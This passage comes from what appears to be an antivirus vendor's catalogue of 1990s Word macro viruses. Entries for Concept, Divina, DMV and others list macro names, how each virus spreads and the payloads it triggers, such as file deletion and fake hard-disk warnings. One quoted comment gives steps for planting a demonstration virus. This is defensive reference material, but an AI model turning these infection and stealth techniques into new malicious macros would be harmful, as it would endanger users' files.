  18534. "a" with an "e"
  18535.  
  18536.  
  18537.  
  18538. [WORD_Concept.I]
  18539. Virus name: WORD_Concept.I
  18540. Virus Type: Word macro virus
  18541. Number of  macros: 4 or 5
  18542. Encrypted: No
  18543. Macro names: AAAEED, AAAUUO, IPayload, DocClose, ToolsSpelling
  18544. Size of macros: 2885 Bytes
  18545. Place of origin: USA
  18546. Date of origin: September 1996
  18547. Destructive: No
  18548. Common In-The-Wild: No
  18549. Description:
  18550.  
  18551. Concept.I activates when an infected document is closed
  18552. (DocClose).
  18553.  
  18554. Further documents become infected in two different ways.
  18555. It infects when the user selects the option "Tools/Spelling" or
  18556. when an infected document is closed (DocClose).
  18557. Depending on the selected infection routine, a new infected
  18558. document contains 5 (DocClose infection routine) macros or
  18559. only 4 (Tools/Spelling infection routine) macros.
  18560.  
  18561. Upon infection of a new document, Concept.I displays a
  18562. message with a " 1 " in it.
  18563.  
  18564.  
  18565. [WORD_Concept.J (a.k.a. Parasite.B)]
  18566. Virus name: WORD_Concept.J (a.k.a. Parasite.B)
  18567. Virus Type: Word macro virus
  18568. Number of macros: 7
  18569. Encrypted: Yes
  18570. Macro names: K, A678, Para, Site, Payload, AutoOpen
  18571. Size of macros: 3326 Bytes in .doc files
  18572.                 3042 Bytes in .dot files
  18573. Place of origin: USA
  18574. Date of origin: Summer 1996
  18575. Destructive: Yes
  18576. Common In-The-Wild: Yes
  18577. Description:
  18578.  
  18579. The main difference between this new variant and Concept.G
  18580. is that it does not have the "I8U9YB" macro (AutoExit in the
  18581. global template).
  18582.  
  18583. It also does not replace "." (dot) with "," (comma) on the 16th
  18584. of each month.
  18585.  
  18586. Concept.J still has some other payloads. It checks the system
  18587. time for a specific value in the days section. In case of a 16
  18588. (every 16th of the month) it activates its payloads. It then
  18589. replaces the following letters/word in infected documents:
  18590.  
  18591. "and" with "not"
  18592.  
  18593. "e" with an "a" (this used to be "a" with an "e" in Concept.G).
  18594.  
  18595.  
  18596. [WORD_Concept.K:NL (a.k.a. Pheeew)]
  18597. Virus name: WORD_Concept.K:NL (a.k.a. Pheeew)
  18598. Virus Type: Word macro virus
  18599. Number of macros: 4
  18600. Encrypted: No
  18601. Macro names: AutoOpen, IkWordNietGoed1, IkWordNietGoed2, Lading
  18602. Size of macros: 2759 Bytes
  18603. Place of origin: Unknown
  18604. Date of origin: Unknown
  18605. Destructive: Yes
  18606. Common In-The-Wild: No
  18607. Description:
  18608.  
  18609. Concept.K is the first Dutch macro virus.
  18610.  
  18611. When an infected document is opened, Concept.K checks for a
  18612. previous infection of the global template (normal.dot). It does
  18613. this by looking for the two names of the macros "Lading" and
  18614. "BestandOpslaanAls". If the global template is not infected,
  18615. Concept.K copies its virus macros into the global template.
  18616. The macro "IkWordNietGoed2" is saved under the name
  18617. "BestandOpslaanAls" ("FileSaveAs").
  18618.  
  18619. Further documents become infected when the "FileSaveAs"
  18620. command is used. After infection the virus shows various windows
  18621. with the following text:
  18622.  
  18623. Window 'Important':
  18624.  
  18625. "   Gotcha !   "
  18626.  
  18627. Window 'FINAL WARNING!':
  18628.  
  18629. "   STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC   "
  18630.  
  18631. If a user clicks the "No" button on the last window, a destructive
  18632. payload is activated. All files in the "C:\" and "C:\DOS"
  18633. directory are deleted. This leaves the computer unbootable.
  18634.  
  18635.  
  18636. [WORD_Concept.L (a.k.a. BlastC)]
  18637. Virus name: WORD_Concept.L (a.k.a. BlastC)
  18638. Virus Type: Word macro virus
  18639. Number of macros: 7
  18640. Encrypted: No
  18641. Macro names: Alignment, AutoOpen, BorderSet, FileSaveAs,
  18642.              AutoClose, ExitRoutine, BlastCDrive
  18643. Size of macros: 3744 Bytes
  18644. Place of origin: USA
  18645. Date of origin: Unknown
  18646. Payload:         Yes
  18647. Common In-The-Wild: No
  18648. Description:
  18649.  
  18650. Concept.L activates when an infected document is opened
  18651. (AutoOpen).  Further documents become infected when they
  18652. are saved (FileSaveAs).
  18653.  
  18654. Concept.L displays 2 messages:
  18655.  
  18656. Upon activation:
  18657.  
  18658. "   Welcome to the 'WINWORD_BLAST_C' macro virus...   "
  18659.  
  18660. After infection of the global template (Normal.dot):
  18661.  
  18662. "   Uh Ohhh. NORMAL.DOT just got infected...   "
  18663.  
  18664. Upon closing the active document on the 24th of each month,
  18665. Concept.L will start its destructive payload. It will launch the
  18666. File Manager and delete the directory C:\DELETEME.
  18667.  
  18668.  
  18669. [WORD_Concept.M (a.k.a. New_Horizon)]
  18670. Virus name: WORD_Concept.M (a.k.a. New_Horizon)
  18671. Virus Type: Word macro virus
  18672. Number of macros: 5
  18673. Encrypted: No
  18674. Macro names: Alignment, AutoOpen, BorderSet, FileSaveAs,
  18675.              AutoClose, ExitRoutine
  18676. Size of macros: 2432 Bytes in .doc files
  18677.                 2055 Bytes in global template
  18678. Place of origin: USA
  18679. Date of origin: Unknown
  18680. Destructive: No
  18681. Common In-The-Wild: No
  18682. Description:
  18683.  
  18684. Concept.M activates when an infected document is opened
  18685. (AutoOpen).  Further documents become infected when they
  18686. are saved with the "FileSaveAs" command.
  18687.  
  18688. This new Concept variant displays 2 messages:
  18689.  
  18690. Upon activation:
  18691.  
  18692.  "   Uh Ohhh. NORMAL.DOT just got infected...   "
  18693.  
  18694. Upon opening of an infected document:
  18695.  
  18696. "   Welcome to the Winword.New_Horizons macro virus   "
  18697.  
  18698.  
  18699. [WORD_Concept.N (a.k.a. Concept.hcr)]
  18700. Virus name: WORD_Concept.N (a.k.a. Concept.hcr)
  18701. Virus Type: Word macro virus
  18702. Number of macros: 4
  18703. Encrypted: Yes
  18704. Macro names: FileSaveAs, XAAZAO, XAAZFS, XayLoad
  18705. Size of macros: 1968 Bytes
  18706. Place of origin: Unknown
  18707. Date of origin: November 1996
  18708. Destructive: No
  18709. Common In-The-Wild: No
  18710. Description:
  18711.  
  18712. Concept.N is a new variant based on the original Concept.A
  18713. virus.
  18714.  
  18715. All of its macro names start with the letter "X" (except for
  18716. FileSaveAs). Therefore, Concept.N is classified as an intended virus,
  18717. since it does not replicate naturally.
  18718.  
  18719.  
  18720. [WORD_Concept.O:Tw]
  18721. Virus name: WORD_Concept.O:Tw
  18722. Virus Type: Word macro virus
  18723. Number of macros: 4
  18724. Encrypted: No
  18725. Macro names: AutoOpen, Payload, AAAZAO, AAAZFS
  18726. Size of macros: 1968 Bytes in documents
  18727. Place of origin: Unknown
  18728. Date of origin: 1996
  18729. Destructive: No
  18730. Common In-The-Wild: Yes
  18731. Description:
  18732.  
  18733. The main difference between this new variant and the original
  18734. Concept.A virus is that Concept.O only works with the Chinese
  18735. version of Microsoft Word.
  18736.  
  18737. Concept.O infects the global template when an infected
  18738. document is opened (AutoOpen). Further documents become
  18739. infected when they are saved with the "FileSaveAs" command.
  18740.  
  18741. For more information, please refer to the Concept.A virus description.
  18742.  
  18743.  
  18744. [WORD_Concept.Q]
  18745. Virus name: WORD_Concept.Q
  18746. Virus Type: Word macro virus
  18747. Number of macros: 4
  18748. Encrypted: No
  18749. Macro names: AutoOpen, Payload, AAAZAO, AAAZFS
  18750. Size of macros: 1959 Bytes in documents
  18751.                 1652 Bytes in global template
  18752. Place of origin: Unknown
  18753. Date of origin: 1996
  18754. Destructive: No
  18755. Common In-The-Wild: Yes
  18756. Description:
  18757.  
  18758. The difference between this new variant and the original
  18759. Concept virus is the contents of the "Payload" macro.
  18760. Concept.Q does not contain the comment "That's enough to
  18761. prove my point."
  18762.  
  18763. Concept.Q infects the global template when an infected
  18764. document is opened (AutoOpen). Further documents become
  18765. infected when they are saved with the "FileSaveAs" command.
  18766.  
  18767. For more information, please refer to the Concept.A virus description.
  18768.  
  18769.  
  18770. [WORD_Concept.R (a.k.a Sutra, Diamond)]
  18771. Virus name: WORD_Concept.R (a.k.a Sutra, Diamond)
  18772. Virus Type: Word macro virus
  18773. Number of macros: 4
  18774. Encrypted: No
  18775. Macro names: AutoOpen (FileSaveAs), CTFISTCCLLESS11, "CTFBORNIN83"
  18776.              DiamondSutra, FileSaveAs
  18777. Size of macros: 4069 Bytes in .doc files
  18778.                 3221 Bytes in global template
  18779. Place of origin: Unknown
  18780. Date of origin: Unknown
  18781. Destructive: No
  18782. Seen In-The-Wild: No
  18783. Description:
  18784.  
  18785. This new variant is based on the original Concept.A virus. Only
  18786. a few additions have been made and some macro names were
  18787. changed.
  18788.  
  18789. When Concept.R infects the global template it displays various
  18790. messages:
  18791.  
  18792. "   SHOSHI-11=TCCL6F200P,in 1983, Japan!!!!!   "
  18793.  
  18794. "   SHOSHIisCTFexactly, inYYY with pwd 901109, BUT less 11years   "
  18795. "   BUT SEEMS & CHAR === EXACT   "
  18796.  
  18797. "   Guy who understand 29 and Prajnaparamita Diamond Sutra   "
  18798. "   governors noble truth within the self self self self self so   "
  18799. "   CTF=TCCL-11 BUT CTF in 1983   "
  18800.  
  18801. "  CTF's wife is LTC.JAC 24 ; CTF = SUN SUN SUN SUN + 4 CRUELTY   "
  18802.  
  18803. "   You will then tell your friends and your friends will tell   "
  18804. "   others and other .. other other other other other other !!!!!   "
  18805. "   till till till the sun rises in the east which means   "
  18806. "   CTF=TCCLby all sense   "
  18807.  
  18808. When a document becomes infected, Concept.R adds an
  18809. AutoCorrect entry that replaces "teh" with "Shoshi in 1983 is
  18810. the Sun." This payload works only with the Windows 95
  18811. version of Microsoft Word (Word 7.0).
  18812.  
  18813.  
  18814. [WORD_Concept.V]
  18815. Virus name: WORD_Concept.V
  18816. Virus Type: Word macro virus
  18817. Number of macros: 3
  18818. Encrypted: No
  18819. Macro names: AutoOpen, MSlothAE, MSlothSA
  18820. Size of macros: 1484 Bytes
  18821. Place of origin: USA
  18822. Date of origin: January 1997
  18823. Payload: Yes
  18824. Common In-The-Wild: No
  18825. Description:
  18826.  
  18827. Concept.V is a new variant based on Concept and the Wazzu.H
  18828. virus.  It includes the payload routine from Wazzu.H, inside the
  18829. "AutoExec" macro (MSlothAE in documents), and the
  18830. "AutoOpen" ("FileSaveAs" in the global template) from
  18831. Concept.
  18832.  
  18833. Even though this new variant is based on two different viruses,
  18834. it is still able to spread and infect further documents.
  18835.  
  18836. For more information, please refer to the Wazzu.H and
  18837. Concept.A virus descriptions.
  18838.  
  18839.  
  18840. [WORD_Concept.Y]
  18841. Virus name: WORD_Concept.Y
  18842. Virus Type: Word macro virus
  18843. Number of macros: 4
  18844. Encrypted: No
  18845. Macro names: AAAZAO, AAAZFS, Payload, AutoOpen
  18846. Size of macros: 1992 Bytes
  18847. Place of origin: Unknown
  18848. Date of origin: 1997
  18849. Destructive: No
  18850. Common In-The-Wild: No
  18851. Description:
  18852.  
  18853. Concept.Y is a new variant based on the original Concept.A
  18854. virus.  The main difference between the two viruses is the
  18855. "Payload" macro, which has the following addition to its macro
  18856. code:
  18857.  
  18858. "   (For testing only...)   "
  18859.  
  18860. For more information, please refer to the Concept.A virus description.
  18861.  
  18862.  
  18863. [WORD_Concept.Z]
  18864. Virus name: WORD_Concept.Z
  18865. Virus Type: Word macro virus
  18866. Number of macros: 4
  18867. Encrypted: No
  18868. Macro names: AutoOpen, AAAAAB, AAAAAC, AAAAAD
  18869.              (AAAAAA, FileSave, FileSaveAs, ToolsMacro)
  18870. Size of macros: 1774 Bytes
  18871. Place of origin: Unknown
  18872. Date of origin: 1996
  18873. Destructive: No
  18874. Common In-The-Wild: Yes
  18875. Description:
  18876.  
  18877. Concept.Z activates when an infected document is opened
  18878. (AutoOpen).  Further documents become infected when they
  18879. are saved with the "FileSave" and "FileSaveAs" commands.
  18880.  
  18881. After infecting the global template, Concept.Z makes an entry
  18882. in the WINWORD6.INI file. It sets "WW6I=1."
  18883.  
  18884. Concept.Z tries to hide its presence by using "ToolsMacro"
  18885. (called macro stealth technique). It does not contain any
  18886. destructive payload.
  18887.  
  18888.  
  18889. [WORD_CountTen.A (a.k.a. SaveCount)]
  18890. Virus name: WORD_CountTen.A (a.k.a. SaveCount)
  18891. Virus Type: Word macro virus
  18892. Number of macros: 3
  18893. Encrypted: Yes
  18894. Macro names: AutoOpen FileSave, FileSaveAs
  18895. Size of macros: 956 Bytes
  18896. Place of origin: United States
  18897. Date of origin: December 1996
  18898. Destructive: Yes
  18899. Seen In-The-Wild: Yes
  18900. Description:
  18901.  
  18902. CountTen infects documents when an infected document is
  18903. opened and saved via the "FileSave" and FileSaveAs"
  18904. commands.
  18905.  
  18906. When CountTen infects a file, it sets the variable "SaveCount."
  18907. When an infected file is saved, this variable increments. This
  18908. technique is used to keep track of the number of times an
  18909. infected document has been saved. Upon reaching 10,
  18910. CountTen sets the following password:
  18911.  
  18912. "   What the hell are you doing?   "
  18913.  
  18914. This password is too long for the Microsoft Word password
  18915. box and therefore users can not change the password.
  18916.  
  18917. To get access to a password encrypted file, remove the viral
  18918. macros and create an "AutoOpen" macro with the following
  18919. information in the global template (NORMAL.DOT):
  18920.  
  18921. Sub Main
  18922. ToolsUnprotectDocument.DocumentPassword="What the hell
  18923. are you doing?"
  18924. End Sub
  18925.  
  18926.  
  18927. [WORD_Daniel.A (a.k.a Daniel_1F)]
  18928. Virus name: WORD_Daniel.A (a.k.a Daniel_1F)
  18929. Virus Type: Word macro virus
  18930. Number of macros: 2
  18931. Encrypted: Yes
  18932. Macro names: AutoOpen (Word6Menu), MacroManager
  18933. Size of macros: 2718 Bytes
  18934. Place of origin: Unknown
  18935. Date of origin: September 1996
  18936. Destructive: Yes
  18937. Common In-The-Wild: No
  18938. Description:
  18939.  
  18940. Daniel activates when an infected document is opened
  18941. (AutoOpen).
  18942.  
  18943. By removing the Tools/Macro option, Daniel tries to make
  18944. recognition of an infected file more difficult (called macro
  18945. stealth technique).
  18946.  
  18947. Daniel also redefines the File/Save menu item. Instead of the
  18948. original action, it will run the MacroManager.
  18949.  
  18950. When a file is opened with a non standard extension (not .doc
  18951. or .dot), Daniel will change the document summary info.
  18952. Under the keyword "Daniel_Stone" the following comment can
  18953. be found:
  18954.  
  18955. "   All information should be free   "
  18956.  
  18957.  
  18958. [WORD_Dark.A (a.k.a. DarkSide)]
  18959. Virus name: WORD_Dark.A (a.k.a. DarkSide)
  18960. Virus Type: Word macro virus
  18961. Number of macros: 4
  18962. Encrypted: Yes
  18963. Macro names: AutoClose, DarkSide1, HerramMacro, ToolsMacro
  18964. Size of macros: 1304 Bytes
  18965. Place of origin: Peru
  18966. Date of origin: Unknown
  18967. Payload: Yes
  18968. Seen In-The-Wild: No
  18969. Description:
  18970.  
  18971. Dark infects the global template (normal.dot) when an infected
  18972. document is closed. Further documents become infected when
  18973. they are also closed.
  18974.  
  18975. Upon infection Dark creates the DARKSIDE.1 file in the
  18976. directory of an infected file. The file contains the following
  18977. message:
  18978.  
  18979. "    ATENCION: esta computadora ha sido infectada!.   "
  18980. "    DarkSide1 sin una computadora es como Billy   "
  18981. "    The Kid sin un revolver! !   "
  18982. "    ... Virus DarkSide1 creado en la ciudad de Lima en enero de 1997 "
  18983. "    -=] DarkSide1 Is a peruvian virus writer [=-    "
  18984.  
  18985. To make recognition of an infected document more difficult,
  18986. Dark overwrites the Tools/Macro and Herram/Macro options
  18987. with its own code (called macro stealth technique).
  18988.  
  18989.  
  18990. [WORD_Date.A (a.k.a. AntiDMV, Infezione)]
  18991. Virus name: WORD_Date.A (a.k.a. AntiDMV, Infezione)
  18992. Virus Type: Word macro virus
  18993. Number of macros: 1
  18994. Encrypted: Yes
  18995. Macro names: AutoOpen
  18996. Size of macros: 1042 Bytes
  18997. Place of origin: USA
  18998. Date of origin: 1996
  18999. Destructive: Yes
  19000. Common In-The-Wild: Yes
  19001. Description:
  19002.  
  19003. Date infects the global template (normal.dot) once an infected
  19004. document in opened. Further documents become infected
  19005. when they are opened.
  19006.  
  19007. Infection occurs only until June 1, 1996. By the time you
  19008. read this document, Date should not be a threat anymore even
  19009. though infected documents might still be around.
  19010.  
  19011. Date is also known under the name AntiDMV. This name was
  19012. chosen because it removes the "AutoClose" macro from
  19013. documents. The macro virus "DMV," which has only one
  19014. "AutoClose" macro, can therefore be removed with the
  19015. Date virus.
  19016.  
  19017.  
  19018. [WORD_Dedicato.A:It]
  19019. Virus name: WORD_Dedicato.A:It
  19020. Virus Type: Word macro virus
  19021. Number of macros: 1
  19022. Encrypted: Yes
  19023. Macro names: AutoClose
  19024. Size of macros: 742 Bytes
  19025. Place of origin: Italy
  19026. Date of origin: April 1997
  19027. Payload: Yes
  19028. Seen In-The-Wild: No
  19029. Description:
  19030.  
  19031. Dedicato infects the global template when an infected
  19032. document is closed. Further documents become infected when
  19033. they are also closed (AutoClose).
  19034.  
  19035. Dedicato uses language specific commands, therefore it only
  19036. works with the Italian version of Microsoft Word.
  19037.  
  19038. The following comment can be found in the AutoClose macro:
  19039.  
  19040. "   REM Questo MacroVirus e' dedicato alla mia ex-ragazza   "
  19041. "   REM Federica, che anche se molti diranno il contrario..   "
  19042. "   REM io ho amato tanto...e ora mi manca...   (Gianlu)   "
  19043.  
  19044. When Dedicato triggers (8th and 20th of each month), it
  19045. displays the following 3 messages:
  19046.  
  19047. "   ....MacroVirus Federica in esecuzione....   "
  19048.  
  19049. "   ....Federica Mi Manchi....   "
  19050.  
  19051. "   Master Boot Sector Damaged   "
  19052.  
  19053.  
  19054. [WORD_Dietzel.A]
  19055. Virus name: WORD_Dietzel.A
  19056. Virus Type: Word macro virus
  19057. Number of macros: 5
  19058. Encrypted: Yes
  19059. Macro names: DATEISchliessen, EXTRASMakro, DATEIDokVorlagen,
  19060.              DATEISpeichernUnter, DATEIBeenden
  19061. Size of macros: 3987 Bytes
  19062. Place of origin: Germany
  19063. Date of origin: August 1996
  19064. Destructive: No
  19065. Common In-The-Wild: No
  19066. Description:
  19067.  
  19068. Activation of Dietzel occurs when an infected document is
  19069. closed (DATEISchliessen) or when Microsoft Word is exited
  19070. (DATEIBeenden).
  19071.  
  19072. Dietzel tries to make recognition of an infected document
  19073. more difficult by replacing the Tools/Macro option with a
  19074. dialog box very similar to the original one (called macro
  19075. stealth technique).  It only displays the macros in the global
  19076. template, except for the virus macros.
  19077.  
  19078. Dietzel's infection routine is very similar to that of traditional
  19079. companion viruses. The original document remains untouched,
  19080. instead for each saved document Dietzel creates a copy of the
  19081. infected global template. This new file is stored in the same
  19082. directory but with a .BAK extension.  The saved document is then
  19083. registered based on this new infected template.
  19084. Whenever an infected document is closed the associated
  19085. infected template will be loaded as a global template.
  19086.  
  19087.  
  19088. [WORD_Divina.A (a.k.a. Roberta)]
  19089. Virus name: WORD_Divina.A (a.k.a. Roberta)
  19090. Virus Type: Word macro virus
  19091. Number of macros: 1
  19092. Encrypted: Yes
  19093. Macro names: AutoClose
  19094. Size of macros: 2357 Bytes
  19095. Place of origin: Italy
  19096. Date of origin: 1996
  19097. Destructive: No
  19098. Common In-The-Wild: Yes
  19099. Description:
  19100.  
  19101. Divina infects the global template (normal.dot) when an
  19102. infected document is opened and then closed. Further
  19103. documents become infected when they are closed via the
  19104. "AutoClose" command.
  19105.  
  19106. Divina has two payloads. The first payload checks the system
  19107. time, and in case of a value of 17 in the minutes field, it will
  19108. display a set of windows. Between each displayed box it will
  19109. pause and beep.
  19110.  
  19111. "   ROBERTA TI AMO!   "
  19112.  
  19113. "   Virus 'ROBERTA' is running. Hard Disk damaged. Start antivirus?   "
  19114.  
  19115. "   Exit from system and low level format are recommended.   "
  19116.  
  19117. "   Exit from System?   "
  19118.  
  19119. After the last message Divina tries to exit Windows.
  19120.  
  19121. The second payload is activated on May 21. Divina will again
  19122. check the system clock, and if a document is being closed
  19123. between the 10th and 20th or between the 40th and 50th minute,
  19124. it will display another 2 windows.
  19125.  
  19126. "   DIVINA IS THE BEST!   "
  19127.  
  19128. Even though Divina does not contain any destructive payloads,
  19129. a scared user might low-level format his/her hard drive.
  19130.  
  19131.  
  19132. [WORD_Divina.B (a.k.a. Roberta)]
  19133. Virus name: WORD_Divina.B (a.k.a. Roberta)
  19134. Virus Type: Word macro virus
  19135. Number of macros: 1
  19136. Encrypted: Yes
  19137. Macro names: AutoClose
  19138. Size of macros: 1774 Bytes
  19139. Place of origin: Italy
  19140. Date of origin: 1996
  19141. Destructive: No
  19142. Common In-The-Wild: No
  19143. Description:
  19144.  
  19145. The main difference between this new variant and the original
  19146. Divina.A virus is that Divina.B does not have the second
  19147. payload, which activates on May 21.
  19148.  
  19149. Divina.B infects the global template (normal.dot) when an
  19150. infected document is opened and then closed. Further
  19151. documents become infected when they are closed with the
  19152. "AutoClose" command.
  19153.  
  19154. Divina.B has one payload that checks the system time, and
  19155. in case of a value of 17 in the minutes field, it will display a
  19156. set of windows. Between each displayed box it will pause and
  19157. beep.
  19158.  
  19159. "   ROBERTA TI AMO!   "
  19160.  
  19161. "   Hard Disk damaged   "
  19162.  
  19163. "   Exit from system and low level format are recommended.   "
  19164.  
  19165. "   Exit from System?   "
  19166.  
  19167.  
  19168. After the last message Divina tries to exit Windows.
  19169.  
  19170. Even though Divina.B does not contain any destructive
  19171. payloads, a scared user might low-level format his/her hard drive.
  19172.  
  19173.  
  19174. [WORD_Divina.C (a.k.a. Roberta)]
  19175. Virus name: WORD_Divina.C (a.k.a. Roberta)
  19176. Virus Type: Word macro virus
  19177. Number of macros: 1
  19178. Encrypted: Yes
  19179. Macro names: AutoClose
  19180. Size of macros: 3234 Bytes
  19181. Place of origin: Italy
  19182. Date of origin: 1996
  19183. Destructive: No
  19184. Common In-The-Wild: No
  19185. Description:
  19186.  
  19187. Divina.C is a rewritten variant of Divina. It does not contain
  19188. the second payload, which activates on May 21.
  19189.  
  19190. Divina.C infects the global template (normal.dot) when an
  19191. infected document is opened and then closed. Further
  19192. documents become infected when they are closed (AutoClose).
  19193.  
  19194. Divina.C has one payload that checks the system time, and
  19195. in case of a value of 17 in the minutes field, it will display a
  19196. set of windows. Between each displayed box it will pause and
  19197. beep. After the last message Divina tries to exit Windows.
  19198.  
  19199.  
  19200. [WORD_Divina.D (a.k.a. Roberta)]
  19201. Virus name: WORD_Divina.D (a.k.a. Roberta)
  19202. Virus Type: Word macro virus
  19203. Number of macros: 1
  19204. Encrypted: Yes
  19205. Macro names: AutoClose
  19206. Size of macros: 3234 Bytes
  19207. Place of origin: Italy
  19208. Date of origin: 1996
  19209. Destructive: No
  19210. Common In-The-Wild: Yes
  19211. Description:
  19212.  
  19213. The main difference between this new variant and Divina.C is
  19214. that the code has been slightly modified.
  19215. Divina.D infects the global template (normal.dot) when an
  19216. infected document is opened and then closed. Further
  19217. documents become infected when they are closed (AutoClose).
  19218.  
  19219. Divina.D has one payload that checks the system time, and
  19220. in case of a value of 17 in the minutes field, it will display a
  19221. set of windows. Between each displayed box it will pause and
  19222. beep.  After the last message Divina.D tries to exit Windows.
  19223.  
  19224.  
  19225. [WORD_Divina.E (a.k.a. Roberta)]
  19226. Virus name: WORD_Divina.E (a.k.a. Roberta)
  19227. Virus Type: Word macro virus
  19228. Number of macros: 1
  19229. Encrypted: Yes
  19230. Macro names: AutoClose
  19231. Size of macros: 3295 Bytes
  19232. Place of origin: Italy
  19233. Date of origin: 1996
  19234. Destructive: No
  19235. Common In-The-Wild: No
  19236. Description:
  19237.  
  19238. The main difference between this new variant and Divina.C is
  19239. that the code has been slightly modified.
  19240. Divina.E contains 2 lines made out of "*".
  19241.  
  19242. Divina.E infects the global template (normal.dot) when an
  19243. infected document is opened and then closed. Further
  19244. documents become infected when they are closed (AutoClose).
  19245.  
  19246. Divina.E has one payload that checks the system time, and
  19247. in case of a value of 17 in the minutes field, it will display a
  19248. set of windows. Between each displayed box it will pause and
  19249. beep.  After the last message Divina.E tries to exit Windows.
  19250.  
  19251.  
  19252. [WORD_Divina.F (a.k.a. Roberta)]
  19253. Virus name: WORD_Divina.F (a.k.a. Roberta)
  19254. Virus Type: Word macro virus
  19255. Number of macros: 1
  19256. Encrypted: Yes
  19257. Macro names: AutoClose
  19258. Size of macros: 3234 Bytes
  19259. Place of origin: Italy
  19260. Date of origin: 1997
  19261. Destructive: No
  19262. Common In-The-Wild: No
  19263. Description:
  19264.  
  19265. The main difference between this new variant and the previous
  19266. Divina viruses is that the code has been slightly modified.
  19267.  
  19268. Divina.F infects the global template (normal.dot) when an
  19269. infected document is opened and then closed. Further
  19270. documents become infected when they are closed (AutoClose).
  19271.  
  19272. For more information, please refer to the previous Divina virus
  19273. descriptions.
  19274.  
  19275.  
  19276. [WORD_DMV.A (a.k.a. Demonstration)]
  19277. Virus name: WORD_DMV.A (a.k.a. Demonstration)
  19278. Virus Type: Word macro virus
  19279. Number of macros: 1
  19280. Encrypted: No
  19281. Macro names: AutoClose
  19282. Size of macros: 3002 Bytes
  19283. Place of origin: USA
  19284. Date of origin: Fall 1994
  19285. Destructive: No
  19286. Common In-The-Wild: No
  19287. Description:
  19288.  
  19289. DMV was the first macro virus written by Joel McNamara, who
  19290. published a detailed paper about macro viruses. It is believed
  19291. that DMV invited additional virus authors to write Word macro
  19292. viruses. While the paper was not published until Concept was
  19293. discovered, it helped virus authors to use new techniques.
  19294. Joel McNamara also published an Excel macro virus, which is
  19295. nonfunctional (EXCEL_DMV.A)
  19296.  
  19297. DMV infects the global template (normal.dot) when an infected
  19298. document is closed. Further documents become infected when
  19299. they are also closed.
  19300.  
  19301. Upon infection, DMV displays the following messages:
  19302.  
  19303. "   Counting global macros   "
  19304.  
  19305. "   AutoClose macro virus is already installed in NORMAL.DOT.   "
  19306.  
  19307. "   Infected NORMAL.DOT with a copy of AutoClose macro virus.   "
  19308.  
  19309. "   AutoClose macro virus already present in this document.   "
  19310.  
  19311. "   Saved current document as template.   "
  19312.  
  19313. "   Infected current document with copy of AutoClose macro virus.   "
  19314.  
  19315. "   Macro virus has been spread. Now execute some other code   "
  19316. "                 (good, bad, or indifferent).                 "
  19317.  
  19318.  
  19319. [WORD_DMV.B (a.k.a. Waverly)]
  19320. Virus name: WORD_DMV.B (a.k.a. Waverly)
  19321. Virus Type: Word macro virus
  19322. Number of macros: 1
  19323. Encrypted: No
  19324. Macro names: AutoClose
  19325. Size of macros: 1249 Bytes
  19326. Place of origin: Australia
  19327. Date of origin: 1006
  19328. Payload: Yes
  19329. Seen In-The-Wild: No
  19330. Description:
  19331.  
  19332. DMV.B infects the global template (normal.dot) when an
  19333. infected document is closed.  Further documents become
  19334. infected when they are also closed (AutoClose).
  19335.  
  19336. If the second field is higher than 45 and the month is October
  19337. or later, DMV.B adds the following text at the end of the active
  19338. document:
  19339.  
  19340. " We are citizens of Australia.   "
  19341. " We are youth of Victoria.   "
  19342. " We are victims of Mount Waverley Secondary College.   "
  19343. " We tolerated your discipline.   "
  19344. " We stomached your abuse.   "
  19345. " We bore your unprofessionalism.   "
  19346. " We toed the line to protect the bullshit image of YOUR school.   "
  19347. " We watched our friends be pressured out of your school,   "
  19348. " just so you could keep your fucking pass rate figures up.   "
  19349. " And now the world will see, through the spread of this virus
  19350. " just how TOTALLY FUCKED UP we are!   "
  19351. " Parents: yeah- go ahead send your kids to a school where about half
  19352. " of us use drugs. You won't see those figures in the glossy brochure."
  19353. " This community announcement was proudly sponsored by:   "
  19354. " M.W.S.C. Year 12 Class Of '96. - in YOUR face.   "
  19355.  
  19356.  
  19357.  
  19358. [WORD_DMV.C]
  19359. Virus name: WORD_DMV.C
  19360. Virus Type: Word macro virus
  19361. Number of macros: 1
  19362. Encrypted: No
  19363. Macro names: AutoClose
  19364. Size of macros: 2990 Bytes
  19365. Place of origin: Unknown
  19366. Date of origin: Unknown
  19367. Destructive: No
  19368. Seen In-The-Wild: No
  19369. Description:
  19370.  
  19371. The difference between this new variant and the original
  19372. DMV.A virus is that some of the virus codes have been
  19373. reformatted and some parts are missing (e-mail address).
  19374.  
  19375. DMV.C infects the global template (normal.dot) when an
  19376. infected document is closed.  Further documents become
  19377. infected when they are also closed.
  19378.  
  19379. The following messages are displayed when the global
  19380. template becomes infected:
  19381.  
  19382. "   Counting global macros   "
  19383. "   Infected NORMAL.DOT with copy of AutoClose macro virus   "
  19384. "   Macro vir. has been spread. Now execute some other code.   "
  19385.  
  19386. When a new document becomes infected (global template is
  19387. already infected), DMV displays the following message:
  19388.  
  19389. "   AutoClose macro vir. is already installed in NORMAL.DOT   "
  19390. "   Saved current document as template.   "
  19391. "   Infected current .doc with copy of AutoClose macro vir.   "
  19392. "   Macro vir. has been spread. Now execute some other code.   "
  19393.  
  19394. The virus code contains the following message at the top of
  19395. the code:
  19396.  
  19397. "   REM This demonstrates an application-specific document virus   "
  19398. "   REM generated by an automatic macro in Microsoft Word for   "
  19399. "   REM Windows 6.0. Code is executed each time a document is closed."
  19400. "   REM This macro is only a demonstration, and does not perform any "
  19401. "   REM destructive actions.   "
  19402.  
  19403. "   REM The purpose of this code is to reveal a significant security "
  19404. "   REM risk in software that supports macro languages with   "
  19405. "   REM auto-loading capabilities.  Current virus detection tools are"
  19406. "   REM not presently capable of detecting this type of virus, and   "
  19407. "   REM most users are blissfully unaware that threats can come from "
  19408. "   REM documents.   "
  19409.  
  19410. "   REM Paste this code in the macro Window of a Word document   "
  19411. "   REM template. Save the macro as AutoClose.  Enter some random   "
  19412. "   REM text in the main word processing window and save the document."
  19413. "   REM Now copy the file, naming the new file VIRUS.DOC.  Open   "
  19414. "   REM VIRUS.DOC in Word.  It will appear as a normal document, but  "
  19415. "   REM when you close the document, the virus will execute.   "
  19416.  
  19417. "   REM Message boxes display progress as the code is executed.   "
  19418. "   REM Code is commented.   "
  19419.  
  19420. "   REM Joel McNamara, December 17, 1994   "
  19421.  
  19422.  
  19423. [WORD_Doggie.A]
  19424. Virus name: WORD_Doggie.A
  19425. Virus Type: Word macro virus
  19426. Number of macros: 3
  19427. Encrypted: No
  19428. Macro names: AutoOpen, Doggie, FileSaveAs
